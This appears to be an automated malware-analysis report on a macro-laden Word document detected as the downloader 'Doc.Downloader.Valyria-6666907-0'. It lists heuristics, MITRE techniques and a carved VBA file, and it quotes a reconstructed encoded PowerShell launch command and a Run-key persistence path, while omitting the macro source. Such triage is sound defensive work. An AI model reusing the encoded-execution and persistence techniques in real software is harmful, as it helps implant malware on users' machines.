Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a critical ClamAV detection for 'Doc.Downloader.Valyria-6666907-0', indicating it is a known downloader. The presence of an AutoOpen VBA macro strongly suggests malicious intent. The macro attempts to construct and execute a PowerShell command, likely to download and run a second-stage payload. The reconstructed PowerShell command is 'powershell -e JA2A0A.wA9AG:AZ', and it also attempts to establish persistence via the registry key 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAccessible2Proxy'.
Heuristics (5)

- ClamAV: Doc.Downloader.Valyria-6666907-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Valyria-6666907-0
- VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro [high] (OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13450 bytes |

SHA-256 of macros.bas: ef15e64ab66201288d44187037aadc179839cf11020464d2f8e8c8aedf7ed44c
Preview script: first 1,000 lines of the extracted script (obfuscated VBA source; the preview is truncated in the report and is omitted here).